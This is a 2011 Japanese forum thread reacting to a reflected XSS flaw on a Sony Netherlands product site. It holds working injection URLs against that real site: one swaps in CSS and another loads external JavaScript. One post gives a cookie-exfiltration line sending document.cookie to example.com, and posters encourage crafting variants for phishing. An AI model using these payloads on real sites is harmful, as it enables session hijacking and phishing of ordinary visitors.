ソニーのサイトにXSS

このエントリーをはてなブックマークに追加
1名無しさん@涙目です。(東日本)

http://www.sonyproductinformatie.nl/main/search.php?searchfield=%3Cstyle%3E%23logo%7Bbackground-image%3Aurl(http%3A%2F%2Fwww.nintendo.co.jp%2Fimg%2FlogoNintendo.png)%20!important%3Bwidth%3A134px%20!important%3B%3C%2Fstyle%3E&x=19&y=20
2名無しさん@涙目です。(catv?):2011/05/07(土) 19:15:44.74 ID:E1YWP4ce0
↓ハッカーが一言
3名無しさん@涙目です。(茨城県):2011/05/07(土) 19:16:04.88 ID:lLMS7IaW0
↓ハッカーが一言
4名無しさん@涙目です。(catv?):2011/05/07(土) 19:16:14.55 ID:TWGSASpM0
一体なにがはじまるんです?
5名無しさん@涙目です。(東日本):2011/05/07(土) 19:16:33.31 ID:aJKbvXy/0
こっちの方がいいか
http://bit.ly/iOB1JN
6名無しさん@涙目です。(埼玉県):2011/05/07(土) 19:16:36.24 ID:fFLfHtK80
まじかよ糞箱買ってくる
7 忍法帖【Lv=40,xxxPT】 【東電 82.9 %】 (東京都):2011/05/07(土) 19:16:38.00 ID:d5cEs+lk0
XML
8名無しさん@涙目です。(長屋):2011/05/07(土) 19:17:02.73 ID:XXOnqS1M0
はえーな
父さん、プレゼント買ってないぞ
9名無しさん@涙目です。(埼玉県):2011/05/07(土) 19:17:17.73 ID:fFLfHtK80
クロスサイトスクリプチング>?
10名無しさん@涙目です。(千葉県):2011/05/07(土) 19:17:29.82 ID:eGA/bmSA0
くるぞ・・・
11名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:17:30.50 ID:8EJP25c00
XML、な。
12名無しさん@涙目です。(関西地方):2011/05/07(土) 19:17:34.88 ID:NKiVSTRG0
SONYなのに任天堂?
13番組の途中ですが名無しです ◆GEMkLJbZ/. (東京都):2011/05/07(土) 19:18:10.10 ID:QW/8dBnQ0 BE:64356252-2BP(3261)

ソニーダメすぎだろ
14名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:18:16.77 ID:9rAS2LbR0
パソコン蛾ぶっ壊れた
15名無しさん@涙目です。(宮崎県):2011/05/07(土) 19:18:19.51 ID:8URTlX2q0
SEX
16名無しさん@涙目です。(catv?):2011/05/07(土) 19:18:37.81 ID:qtIzoixg0
なにがはじまるのか、だれか6行くらいで説明よろしう
17名無しさん@涙目です。(dion軍):2011/05/07(土) 19:18:46.75 ID:cnN8KBnt0
クロスサイトスクリプディング
18名無しさん@涙目です。(西日本):2011/05/07(土) 19:18:56.89 ID:q52bQofT0
何? ソニーなのに踏んだらニンテンドーのサイトが表示されるわけ?
19名無しさん@涙目です。(兵庫県):2011/05/07(土) 19:19:01.26 ID:BBWLnjI30
またハッカーの交流サイトの仕業か!!!
20名無しさん@涙目です。(高知県):2011/05/07(土) 19:19:41.43 ID:u5VtcP/o0
アノニマス、にちゃんねらー、もしくはTwitter民の仕業に違いない
21名無しさん@涙目です。(滋賀県):2011/05/07(土) 19:19:46.85 ID:4JHEf0Yu0
>>5
これ踏むとどうなんの?
22名無しさん@涙目です。(新潟県):2011/05/07(土) 19:19:47.96 ID:4QoE7nMO0
やってみたらタグが効きやがるww ひどすぎワロタwww
おまえら遊ぶなよ!
23名無しさん@涙目です。(東京都):2011/05/07(土) 19:20:03.76 ID:qRVpTmng0
↓ハッカーが一言
24名無しさん@涙目です。(dion軍):2011/05/07(土) 19:20:41.03 ID:ugPw7tHe0
またGKさんファビョっちゃうの?
25名無しさん@涙目です。(石川県):2011/05/07(土) 19:20:42.63 ID:D7WVMPFf0
どこのハッカー交流サイトの仕業だよ
26名無しさん@涙目です。(静岡県):2011/05/07(土) 19:20:51.94 ID:WNklKFH00
そっか
URLのにんてんどーなんちゃらのところに
ブラクラのuRLを入れればいいのね
27名無しさん@涙目です。(catv?):2011/05/07(土) 19:20:54.49 ID:DKrXfTuL0
phpでタグ有効とかw
28名無しさん@涙目です。(栃木県):2011/05/07(土) 19:20:56.10 ID:RJWV4FYa0
           / ̄ ̄ ̄\  
          /  ⌒  ⌒ ヽ 
         /  ( ●)(●) |  
         |    (__人__) }   うーっす
        /、.    ` ⌒´  ヽ  
       /            |   
       |           | /    
       ヽ_|  ┌──┐ |丿     
         |  ├──┤ |      
         |  ├──┤ |
29名無しさん@涙目です。(京都府):2011/05/07(土) 19:21:57.01 ID:7BSpz63/0
クロスサイトスクリプティング (Cross Site Scripting) とは、動的にWebページを生成するアプリケーションのセキュリティ上の不備を意図的に利用し、
狭義にはサイト間を横断して悪意のあるスクリプトを混入させること。また、それを許す脆弱性のこと。
広義にはスクリプトを混入させずとも、任意の要素を混入させられうる脆弱性を含む。略記としてCSS、XSSがある。
CSSは同分野でよく使用されるCascading Style Sheetsの略でもあるので、混乱を避けるためにXSSと表記されることが多い。
攻撃者が対象となるサイトとは異なるサイトからスクリプトを送り込み、訪問者に実行せしめることから、クロスサイト(サイトを横断した)スクリプティング(スクリプト処理)と呼ばれる。
ウェブアプリケーションが入力したデータ(フォーム入力など)を適切にエスケープしないままHTML中に出力することにより、入力中に存在するタグ等文字がそのままHTMLとして解釈される。
ここでスクリプトを起動させることにより、以下に挙げるような攻撃が成立する。
クッキーの値を取得あるいは設定することにより、セッションハイジャックする
強制的なページ遷移を起こさせ、クロスサイトリクエストフォージェリ対策を回避する(取得したクッキーを攻撃者側でそのまま利用できない場合に用いられる手法)
ページ全体を置き換えることにより、偽のページを作り出す(典型的にはフィッシングに用いられる)
フォームの送信先を置換することにより、入力を第三者サイトに送信するよう仕向ける
これらの攻撃が成立することにより、秘密情報の窃取や、回復不可能な権利侵害につながるおそれがある
30名無しさん@涙目です。(不明なsoftbank):2011/05/07(土) 19:23:04.56 ID:l9E4oERW0
まーたおまえらかー
31名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:23:50.38 ID:zIg5O2eX0
よく分からないけどhatten.swf貼ってやればいいと思う
32名無しさん@涙目です。(青森県):2011/05/07(土) 19:24:09.79 ID:MadiRT6d0
踏んだり蹴ったりだな
33名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:24:14.16 ID:M+d5A06C0
圧縮URLでもってフィッシング可能かもしれないってこと?
34名無しさん@涙目です。(北海道):2011/05/07(土) 19:24:48.39 ID:VC4ZXvZe0
踏むの怖いからスクショ張ってくれ
35名無しさん@涙目です。(愛知県):2011/05/07(土) 19:24:55.09 ID:f+H41xk20
これ何でも出来るなw
36名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:24:58.44 ID:UkD3wu6U0
SSXはトリッキーが至高
37名無しさん@涙目です。(岐阜県):2011/05/07(土) 19:24:59.76 ID:WwpgTMWk0
S◯X???!!!
38名無しさん@涙目です。(広島県):2011/05/07(土) 19:25:30.46 ID:QhSUsg/vP
どれどれ
39名無しさん@涙目です。(新潟県):2011/05/07(土) 19:25:56.78 ID:4QoE7nMO0
http://www.sonyproductinformatie.nl/main/search.php
40名無しさん@涙目です。(高知県):2011/05/07(土) 19:25:59.90 ID:u5VtcP/o0
普通にやばいと思うんだけど遊んでいいの?
41名無しさん@涙目です。(catv?):2011/05/07(土) 19:26:05.20 ID:9T+yjzUx0
この会社、ドンだけアホなの?
42名無しさん@涙目です。(東京都):2011/05/07(土) 19:26:26.07 ID:Tx2mpqR70
説明してもらおうか
43名無しさん@涙目です。(長屋):2011/05/07(土) 19:26:47.57 ID:a6wgAiQE0
ど素人か
44名無しさん@涙目です。(関西地方):2011/05/07(土) 19:28:07.96 ID:LtUu+p0h0
ほう
45名無しさん@涙目です。(catv?):2011/05/07(土) 19:29:03.26 ID:oUxztsgk0
ソニー、テメエはもう終わりだあ!
46名無しさん@涙目です。(京都府):2011/05/07(土) 19:29:20.41 ID:7BSpz63/0
だれかいろんなバージョンつくってやw
47名無しさん@涙目です。(高知県):2011/05/07(土) 19:30:01.78 ID:u5VtcP/o0
ソニーのサイトはどうして素人のようなミスがあるの?素人がやってんの?
48名無しさん@涙目です。(dion軍):2011/05/07(土) 19:30:21.84 ID:0l7ym/HYP
タグ有効とか許されるのは小学生までだろw
49名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:30:51.50 ID:M+d5A06C0
こういう脆弱性を指摘して無視された事でハッカー集団が牙をむいたのだとしたら
ソニーを擁護する事なんて到底出来んですが、どうなんだ
50名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:30:58.38 ID:s8tTW2Tj0
よく解らんけどソニーアホってことでいいの?
51名無しさん@涙目です。(高知県):2011/05/07(土) 19:31:19.70 ID:u5VtcP/o0
>>50
いいよ
52名無しさん@涙目です。(北海道):2011/05/07(土) 19:31:48.78 ID:gE135hHf0
これだけポンポン見つかるんだからもう駄目じゃないのw
53名無しさん@涙目です。(dion軍):2011/05/07(土) 19:31:53.48 ID:EDXXE9RC0
グダグダや
54名無しさん@涙目です。(福岡県):2011/05/07(土) 19:32:11.72 ID:DnG/txYk0
>>49
指摘してあげた みたいなハッカー善玉論ってどこから出てきたの
55名無しさん@涙目です。(高知県):2011/05/07(土) 19:32:30.93 ID:6v/R2sBo0
ソニーは一流企業
そんな風に考えていた時期が俺にもありました
56名無しさん@涙目です。(dion軍):2011/05/07(土) 19:32:54.49 ID:8iDkoFma0
馬鹿にされる企業になったね。
57名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:32:56.34 ID:M+d5A06C0
>>54
なんか今回の流出騒ぎについて、そういう経緯をどっかで読んだ気がするんだけど
58名無しさん@涙目です。(dion軍):2011/05/07(土) 19:33:01.15 ID:LyzxHEODP
>>47
今回の被害サイトは海外子会社の〜ってのが多いから
全部、子会社丸投げじゃね?
59名無しさん@涙目です。(空):2011/05/07(土) 19:33:17.43 ID:83v/qXb70
SQLインジェクションといい、脆弱性のオンパレードだな。公開バグ取りしてるみたいな

もっとも、このクラスの脆弱性は他の大手サイトでもゴマンとあるんだろうけど
60名無しさん@涙目です。(神奈川県):2011/05/07(土) 19:34:33.16 ID:3HiYXTmF0
指摘なんてしてないよ
脆弱性を発見したのとは別の、PS3をクラックできるUSBドングリ作って判判したやつ訴えたらそのハッカーが何故かキレて勝手にルートキー公開しただけ
61名無しさん@涙目です。(関西地方):2011/05/07(土) 19:35:04.11 ID:RyA5hqWa0
完全におもちゃ
62名無しさん@涙目です。(dion軍):2011/05/07(土) 19:35:42.67 ID:/BEMtAbrP
検索フォームだからスクリプトコードを直接ページに仕込む事はできないけど、
>>1のような感じでスクリプトを仕込んだURLを貼って、情弱を騙して飛ばす事はできるな
63名無しさん@涙目です。(中部地方):2011/05/07(土) 19:36:03.62 ID:y4Vt/pP30
WEB土方の無能さは異常
64名無しさん@涙目です。(長屋):2011/05/07(土) 19:36:19.75 ID:+xRieBv70
盛田・・・見ているか・・・
65名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:36:29.87 ID:8EJP25c00
クロスサイト・リクエスト・フォージェリ・・・

なんてかっこいい響き・・・
66名無しさん@涙目です。(新潟県):2011/05/07(土) 19:37:51.69 ID:4QoE7nMO0
シングルクォート、ダブルクォートを使うと \ が入る
なにかしらサニタイジングしてるようだが、<と>は変換しとけよw
http://www.dotup.org/uploda/www.dotup.org1615374.jpg

10年くらい前、どこかのV番組の掲示板が全然文字列のサニタイジングしてなくてな、
えっらいお祭りになったんだ
あの頃はみんなやんちゃだったから…
http://www.dotup.org/uploda/www.dotup.org1615383.png
開いた瞬間サイタマサイタマうるせえしカオスだった

ソニーは本当、火事と喧嘩とお祭りが大好きなようだなw
67名無しさん@涙目です。(catv?):2011/05/07(土) 19:38:01.64 ID:IOs1Q+920
formタグを書き込むだけでページが表示されなくなる
前世代のcgi掲示板みたいなことやってんの?
68名無しさん@涙目です。(千葉県):2011/05/07(土) 19:38:05.37 ID:cBUGnMrK0
はまちちゃんに悪用されてこそ真のXSS脆弱性。
69名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:39:00.75 ID:M+d5A06C0
>>60
そうか誤解しとった。登場人物全員ダメだな
70名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:39:36.28 ID:EBIFI7eP0
この際だから
全部洗い出された方が良いだろw
71名無しさん@涙目です。(関西地方):2011/05/07(土) 19:39:38.69 ID:2brFzYEX0
XSSって統一的な回避方法とかないん?
サイトの相違による細かいカスタマイズはあるかもしれんが
普通のHTML出力するくらいなら
「こうすりゃいい」みたいなのないの?
72名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:41:29.74 ID:dHZTQEol0
>>1
任天堂とか書いたスカスカのページが表示されたけどなんなの?
73胡麻ちぉぉ ◆z4iKQ7DWnw (dion軍):2011/05/07(土) 19:42:19.70 ID:MrshfyaB0
オランダか
74名無しさん@涙目です。(栃木県):2011/05/07(土) 19:43:36.22 ID:afuwK3nj0
ブラクラ
75名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:44:04.52 ID:EBIFI7eP0
大手企業って
まともなエンジニアを雇うもんだが
Sonyはコネで無能を引き込んでるのか?
76名無しさん@涙目です。(dion軍):2011/05/07(土) 19:44:25.02 ID:LyzxHEODP
>対策としては、訪問者からの入力内容をそのまま表示せずに、スクリプトなどのコードを識別して無効化する処理を施すことが必要である。
77名無しさん@涙目です。(dion軍):2011/05/07(土) 19:45:43.81 ID:pFiHD2gs0
ソニーのサイトだと思って安心して接続すると危険なサイトに飛ばされるっていうURLが簡単に作れる
78名無しさん@涙目です。(チベット自治区):2011/05/07(土) 19:47:16.25 ID:s8tTW2Tj0
>>77
なるほど
それは問題だな…
79名無しさん@涙目です。(千葉県):2011/05/07(土) 19:47:32.51 ID:z6KdU8Wh0
こんな会社がネットワーク事業をやってるんだから笑える
80名無しさん@涙目です。(千葉県):2011/05/07(土) 19:47:56.69 ID:cHtwIU0v0
セキュリティが弱くて簡単にハッキングされてしまうってことか
81 【news:5】 (東京都):2011/05/07(土) 19:48:18.66 ID:XIgErC7Y0 BE:1069733-2BP(4502) 株優プチ(news)


 (*゚Д゚) なんでお前らがデバッガーやってんのよw
 (ヽノ)   ムホムホ
  >ω>
82名無しさん@涙目です。(空):2011/05/07(土) 19:49:50.00 ID:83v/qXb70
XSSってどこも一度はやらかしてるよ。バグの一種
気付いたらすぐ対策するを徹底しないと
83名無しさん@涙目です。(catv?):2011/05/07(土) 19:50:11.03 ID:Vo0o8+S+i
勘違いしては困る
日本のソニーサイトは最強
米国が貧弱だっただけ
84名無しさん@涙目です。(福島県):2011/05/07(土) 19:51:03.51 ID:JcoqjDc50
スノボのゲームだろ?
85名無しさん@涙目です。(catv?):2011/05/07(土) 19:51:04.81 ID:IqK2RvQu0
これソニーのサイトなの?
86名無しさん@涙目です。(石川県):2011/05/07(土) 19:51:30.14 ID:34VxRVqb0
>>83と信者が意味不明な供述をしており・・・
87名無しさん@涙目です。(岡山県):2011/05/07(土) 19:51:51.01 ID:O4tixFIp0
>>28
           / ̄ ̄ ̄\  
          /  ⌒  ⌒ ヽ 
         /  ( ●)(●) |  
         |    (__人__) }   うーっす
        /、.    ` ⌒´  ヽ  
       /            |   
       |           | /    
       ヽ_|  ┌──┐ |丿     
         |  ├──┤ |      
         |  ├──┤ |
88名無しさん@涙目です。(catv?):2011/05/07(土) 19:51:56.60 ID:9T+yjzUx0
>>75
出井時代に研究費削りまくって、研究員が次々辞めたとか聞いた
89名無しさん@涙目です。(埼玉県):2011/05/07(土) 19:52:23.90 ID:OB19bqFg0
パソコン関係詳しくないんだけど
>>1踏むとどうなるの?
90名無しさん@涙目です。(東京都):2011/05/07(土) 19:52:24.55 ID:LTIe4m6Y0
同じページそっくりの罠サイトにリダイレクトしてカード情報抜くやつ
昔あったよね。あれもXSS?
91名無しさん@涙目です。(京都府):2011/05/07(土) 19:53:30.56 ID:jfrKvIii0
>>89
ただSONYのロゴがNINTENDOになるだけ
URLちょっといじるだけでいろいろ変えれる
92名無しさん@涙目です。(関西地方):2011/05/07(土) 19:53:45.36 ID:U5eHIFpB0
ソニー潰れるの?
93名無しさん@涙目です。(新潟県):2011/05/07(土) 19:53:58.39 ID:4QoE7nMO0
>>90
XSS+フィッシング(Phishing)
94名無しさん@涙目です。(東京都):2011/05/07(土) 19:55:13.13 ID:an4vlUew0
NoScriptはXSSの可能性のあるアクセスを遮断しました

今までも何度か出たことがある警告だが、
実はどんな意味なのかすらわからない
95名無しさん@涙目です。(catv?):2011/05/07(土) 19:55:25.39 ID:wI06iz7e0
>>89
>>1自体はなんてことない。
ソニーのサイトにアクセスしてるのになぜか背景が任天堂ロゴになる程度。
ただ、これを悪用すれば「ソニーのURLに見せかけて悪性攻撃サイトにぶん投げる」ぐらいのことは出来る。はず
96名無しさん@涙目です。(大阪府):2011/05/07(土) 19:55:38.38 ID:khs02cDT0
技術のソニーw
技術wwwのソニーwww
97名無しさん@涙目です。(石川県):2011/05/07(土) 19:55:42.22 ID:Q9rff9960
いい加減自殺するしか無いレベルの額をハッカー(笑)に払わせるしかねえだろ。
ディズニーが糞ガキの卒業制作消させたように。
98名無しさん@涙目です。(栃木県):2011/05/07(土) 19:56:40.95 ID:a9Pbnk5N0
この
http://www.sonyproductinformatie.nl
ってのはマジでソニーのサイトなのか?
99名無しさん@涙目です。(catv?):2011/05/07(土) 19:57:48.88 ID:DKrXfTuL0
>>71
htmlspecialchars
100名無しさん@涙目です。(長屋):2011/05/07(土) 19:57:54.09 ID:Kbv3icN00
>>88
別に研究員じゃなくても普通の奴なら避けるレベル
101名無しさん@涙目です。(広島県):2011/05/07(土) 19:58:08.13 ID:STZkNzxT0
>>97
詳細は分からないがどうも侵入されたようだ()みたいな事言ってる企業がどういう証拠揃えてハッカー訴えるのよw
102名無しさん@涙目です。(神奈川県):2011/05/07(土) 19:58:31.43 ID:0F0FQ5Nh0
>>95
クッキーに含まれたセッション情報を他のサーバーに投げて、セッションハイジャックができるはず。
こんな感じで: location.href = "http://example.com?c=" + document.cookie;
103名無しさん@涙目です。(dion軍):2011/05/07(土) 19:59:15.97 ID:pFiHD2gs0
>>97
>>1は完全にソニーの実装ミスだぞ
石川県民として恥ずかしいわ
同じ会社入ってくんなよ
104名無しさん@涙目です。(長屋):2011/05/07(土) 20:00:18.91 ID:aSEJaO770
やっぱりここは法務部さんの言うとおりハカー掲示板だったのだー
105名無しさん@涙目です。(catv?):2011/05/07(土) 20:00:49.91 ID:9T+yjzUx0
>>100
上のレベルが下がれば、末端なんか知れてるよ、と言いたかったんだ。
106名無しさん@涙目です。(石川県):2011/05/07(土) 20:01:23.00 ID:34VxRVqb0
>>101
ハッカー専用サイトにアドレスがさらされたw
アドレスは非公開だが、判れば外部からアクセスが可能だったw
とかを臆面もなくマスコミに流せる会社ですからw

グーグルのクロールにも引っかかっていたというのに
107名無しさん@涙目です。(千葉県):2011/05/07(土) 20:02:15.26 ID:yMQMamsK0
>>106
グーグルのクローラーがハッカーってことだよ言わせんな恥ずかしい
108名無しさん@涙目です。(広島県):2011/05/07(土) 20:02:21.51 ID:STZkNzxT0
流石にソニー法務部はネタだろ
あんな頭悪い文面で公然と脅しかけるようなのはまともな会社の法務部にはいないよ
109名無しさん@涙目です。(東京都):2011/05/07(土) 20:02:46.08 ID:pqROW8mJ0
スクリプト実行しちゃう脆弱性
110名無しさん@涙目です。(catv?):2011/05/07(土) 20:05:10.04 ID:9T+yjzUx0
>>108
ソニー=まとも
と、定義するならその通りだな
111名無しさん@涙目です。(北海道):2011/05/07(土) 20:07:07.86 ID:i5gbH6HV0
これマジモン?やばいの?

怖くて踏めないわ
112名無しさん@涙目です。(catv?):2011/05/07(土) 20:07:35.54 ID:wgQTSy0h0
XSSって単純に初歩的な処置してないから起きるんじゃないの
ソニーが手抜きしてたって感じ?
113名無しさん@涙目です。(京都府):2011/05/07(土) 20:08:14.47 ID:jfrKvIii0
>>111
踏んでも問題ない
114名無しさん@涙目です。(北海道):2011/05/07(土) 20:08:30.75 ID:D+WDnwAH0
またかよ
スクショください
115名無しさん@涙目です。(東京都):2011/05/07(土) 20:09:55.45 ID:xZdWEGLq0
マジかよゴキブリ息してない
116名無しさん@涙目です。(岩手県):2011/05/07(土) 20:10:04.79 ID:rnuJ423u0
叩けばホコリの出る体w
117名無しさん@涙目です。(関西地方):2011/05/07(土) 20:10:48.47 ID:dIvNWkkf0
>>54
ハッカーは全て悪人ではない個人の人間なんだからそもそも
ハッカー組織に所属する悪の秘密結社とかのわけがねぇだろ
118名無しさん@涙目です。(岩手県):2011/05/07(土) 20:11:49.11 ID:rnuJ423u0
>>117
とはいえ、犯罪者も多数混じってるので要注意
119名無しさん@涙目です。(関西地方):2011/05/07(土) 20:12:08.75 ID:dIvNWkkf0
>>60
違います
脆弱性を指摘したから俺を雇えば直せるよって言ったら、不正アクセスに解析したな、犯罪だから訴える!ってやらかしたから公開された
120名無しさん@涙目です。(埼玉県):2011/05/07(土) 20:12:13.85 ID:q6qfatAL0
ありゃりゃ
121名無しさん@涙目です。(東京都):2011/05/07(土) 20:12:32.40 ID:o6SndIlk0
>>55
全ては出井のせい
122名無しさん@涙目です。(東京都):2011/05/07(土) 20:12:50.21 ID:GC+6I+Oa0
SQLインジェクションやクッキーモンスターもいけるんじゃね?
123名無しさん@涙目です。(北海道):2011/05/07(土) 20:14:01.68 ID:i5gbH6HV0
>>113
dクス
124名無しさん@涙目です。(関西・北陸):2011/05/07(土) 20:14:27.89 ID:B6Wzx7k+O
ハッカーのゴキブリ駆除か
125名無しさん@涙目です。(catv?):2011/05/07(土) 20:16:12.07 ID:6CF3BuL20
お前らいい加減にしろよ^^;
おまえらのせいでPSNがいつまでたっても復旧しねえじゃねえか
遊ぶなら復旧してからやれハゲ
126名無しさん@涙目です。(大阪府):2011/05/07(土) 20:16:11.73 ID:EvHUv9GJ0
Internet Explorerは、クロスサイト スクリプトを防止するために、このページを変更しました
127名無しさん@涙目です。(神奈川県):2011/05/07(土) 20:16:40.19 ID:0F0FQ5Nh0
>>122
%00かなんかを使っていけそうな気はするけど、シャレにならんから止めとけよw > SQLインジェクション
128名無しさん@涙目です。(愛知県):2011/05/07(土) 20:19:50.68 ID:f+H41xk20
中国人あたりがやらかしそうだな
129名無しさん@涙目です。(チベット自治区):2011/05/07(土) 20:23:10.85 ID:dyomUTwM0
ワロタ、エロサイトにも簡単に飛ばせるじゃん
130名無しさん@涙目です。(神奈川県):2011/05/07(土) 20:25:09.05 ID:59jfri7b0
エヴァでいうとどんな状態?
131名無しさん@涙目です。(dion軍):2011/05/07(土) 20:26:02.82 ID:9cpRK1zG0
ソニーもう駄目だろ
次世代機持ってないから何度もPS3買おうか迷ったけど買ってなくて本当に良かった
132名無しさん@涙目です。(東京都):2011/05/07(土) 20:26:32.52 ID:w6XFHWeY0
ソニーさん、strip_tagsでぐぐるといいよ
133名無しさん@涙目です。(神奈川県):2011/05/07(土) 20:27:40.21 ID:bHwDmdI20
ソニーかっこわるい
134名無しさん@涙目です。(catv?):2011/05/07(土) 20:27:59.71 ID:9T+yjzUx0
>>130
エントリープラグ、差し替え放題。
暴走もあるよ☆
135名無しさん@涙目です。(群馬県):2011/05/07(土) 20:29:55.39 ID:mPpx57xf0
世界中のクラッカーが面白がってソニーをいじってるのか
E3までに落ち着くのかよこれ
136名無しさん@涙目です。:2011/05/07(土) 20:30:19.22 ID:3d476lA00
IE9もFF4もXSS検知で止められるわ
137名無しさん@涙目です。(チベット自治区):2011/05/07(土) 20:30:31.29 ID:iyBhdUn60
これのどこがソニーのサイトなんだ

トップページから案内してくれよ
138名無しさん@涙目です。(神奈川県):2011/05/07(土) 20:30:40.06 ID:T2t6i2MW0
http://www.sonyproductinformatie.nl/main/search.php?searchfield=%3Cscript%20src=http://www26.atwiki.jp/_js/headBar.js%3E%3C/script%3E
面白いjsファイルが見つからなかったから適当に使った。確かに読み込まれている
139名無しさん@涙目です。(関東・甲信越):2011/05/07(土) 20:30:40.85 ID:VCOJI7HaO
ニンテンドーのサイトだったでござる
140名無しさん@涙目です。(dion軍):2011/05/07(土) 20:32:07.02 ID:/BEMtAbrP
>>136
IE8でもXSS警告で止まるから釣れるのは少ないだろうね
141名無しさん@涙目です。(dion軍):2011/05/07(土) 20:33:25.00 ID:LyzxHEODP
nlドメインってことはオランダか?
どうせ現地オランダのWEB系デザイン会社にでも丸投げして作らせたんだろう
もちろんセキュリティ意識ゼロはデフォなw
142名無しさん@涙目です。(長屋):2011/05/07(土) 20:34:52.47 ID:8i6cudrh0
これが噂のハカーか!
143名無しさん@涙目です。(東京都):2011/05/07(土) 20:35:18.60 ID:ISIekH7C0
XSSもSQLインジェクションも
主な原因はユーザからの入力データに含まれる特殊文字が
単なるデータじゃなくてプログラムの一部として解釈されて実行されてしまうこと。
前者は不正プログラムがユーザのブラウザ上で発動し、
後者はWEBサーバの裏にあるDBサーバ上で発動する。

XSS脆弱性をついたURLを個人が作成して自分のブラウザで実行する分には
単なるお遊びなんで何ら犯罪として成立しないけど
SQLインジェクション脆弱性をついたURLを個人が作成して自分のブラウザで実行したら
それが無害なものでも不正アクセス禁止法違反の犯罪成立しちゃうからな。
後者は絶対やるなよ。
144名無しさん@涙目です。(神奈川県):2011/05/07(土) 20:36:08.57 ID:56zTcizp0
>>108
現在進行形でまともな対応してないからなぁ
145名無しさん@涙目です。(千葉県):2011/05/07(土) 20:37:38.60 ID:yMQMamsK0
>>144
アプリ側は月曜日にあわてて下請けにゴルァ電します。
修正まで最速2週間程度かかります。

運がよければ運用がWebサーバ止めるかもしれんがな
146名無しさん@涙目です。(中国地方):2011/05/07(土) 20:48:33.79 ID:P8MGxnjB0
買わなくて良かったps3
147名無しさん@涙目です。(チベット自治区):2011/05/07(土) 20:49:30.05 ID:VGIlfA3x0
SQLインジェクションもいくら罰則作ろうが
本気の奴は中国旅行行ったついでにやりそうだから意味なさそう
148名無しさん@涙目です。(関西地方):2011/05/07(土) 20:51:37.24 ID:A+he4uDV0
まさかのSSXトリッキースレ
149名無しさん@涙目です。(愛知県):2011/05/07(土) 20:59:26.86 ID:bQcJaOd00
素人みたいなミスするな
150名無しさん@涙目です。(catv?):2011/05/07(土) 20:59:52.51 ID:awJ4ve6E0
ソニー倒産しろ
151名無しさん@涙目です。(dion軍):2011/05/07(土) 21:00:13.29 ID:/BEMtAbrP
>>149
素人なんだからしょうがない
152名無しさん@涙目です。(高知県):2011/05/07(土) 21:00:39.26 ID:Cd7eRLSd0
SSXはもうすぐ続編出るぞ
153名無しさん@涙目です。(和歌山県):2011/05/07(土) 21:01:22.41 ID:0qXk7wqF0
とりあえず踏んだけどなんも起きんよ???

なにがどうなるのこれ?
154名無しさん@涙目です。(関西地方):2011/05/07(土) 21:01:29.00 ID:bSVT1f/90
いや〜スーパーハカー杉て我が身が恐ろしいわ〜
なにもしてないのにスーパーハカー集団だもんな〜
155名無しさん@涙目です。(関西地方):2011/05/07(土) 21:01:34.36 ID:Y0tdeRhp0
XSSって何?
156名無しさん@涙目です。(dion軍):2011/05/07(土) 21:05:52.09 ID:LuJogbOy0
クロスサイトスクリプティング
昔はCSSって言ってたが
カスケードスタイルシートと紛らわしいんでXSSになった
157名無しさん@涙目です。(千葉県):2011/05/07(土) 21:07:29.73 ID:z9McFHBz0
お前らいい加減にしろよ
またPSN再開が延長するだろ
158名無しさん@涙目です。(千葉県):2011/05/07(土) 21:10:50.71 ID:KdgcBMMi0
なんか凄い懐かしい香りがする
タグ使える掲示板は殆ど2chが突進してたなw
159名無しさん@涙目です。(大阪府):2011/05/07(土) 21:11:52.84 ID:W0l7l6Xi0
中みてないけど、タグ有効なの?
160名無しさん@涙目です。(チベット自治区):2011/05/07(土) 21:12:48.97 ID:yppxdEPt0
こえーからリンク貼るなよ。
思わず踏みそうになるじゃねーか!
161名無しさん@涙目です。(石川県):2011/05/07(土) 21:12:53.82 ID:34VxRVqb0
>>157
正直、ここまでやらかしている体制化
一月、二月はだめだろうて
気長に待てw
162名無しさん@涙目です。(新潟県):2011/05/07(土) 21:14:00.70 ID:CynKyWzi0
どんな言語にもサニタイズ用のライブラリなんていくらでもあるのに
ニートが組んだってもうちょっとマシなプログラム書くだろw
163名無しさん@涙目です。(茨城県):2011/05/07(土) 21:14:02.77 ID:EtEwHDhQ0
ようするに、見知らぬ人間が勝手に家の中に入ってきて、

「ここの金庫の鍵、開いてますよ。僕が入れちゃいました」
「はぁ?つーか勝手に入ってくんなよ!警察に通報してやる!」
「せっかく教えてあげたのに!!仲間に言いふらしてやる!」

ってこと?
164名無しさん@涙目です。(関西地方):2011/05/07(土) 21:15:05.77 ID:cKizig+50
2ちゃんでコレだから、ガチハッカーは色々仕込めるところが多そうだなあ
165名無しさん@涙目です。(福岡県):2011/05/07(土) 21:19:10.49 ID:b8aqt6fa0
ハッカー「ここの金庫の鍵、開いてますよ。僕が入れちゃいました」
ソニー「はぁ?つーか勝手に入ってくんなよ!警察に通報してやる!」
ハッカー「せっかく教えてあげたのに!!仲間に言いふらしてやる!」

(略)

ソニー「どうしよう」
166名無しさん@涙目です。(岐阜県):2011/05/07(土) 21:20:52.59 ID:mSpjyuF60
ハッカー訴えちゃったからもう誰もセキュリティホール見つけても教えてくれないだろう
167名無しさん@涙目です。(関西地方):2011/05/07(土) 21:24:54.80 ID:wjed8k6P0
>>166
実際別の3月ごろ別のハッカーに助け求めたがお断りされてる
168名無しさん@涙目です。(広島県):2011/05/07(土) 21:26:57.62 ID:STZkNzxT0
>>167
そらハッカー界隈なんて狭い世界だからおいあいつパクられたぞってなったらいい気はせんわな
169名無しさん@涙目です。(不明なsoftbank):2011/05/07(土) 21:27:21.28 ID:AnfRkzUV0
ソニーのサイトにXSS
http://kamome.2ch.net/test/read.cgi/ghard/1304767367/

ソニーのサイトにXSS
http://kamome.2ch.net/test/read.cgi/ghard/1304766425/

>>1
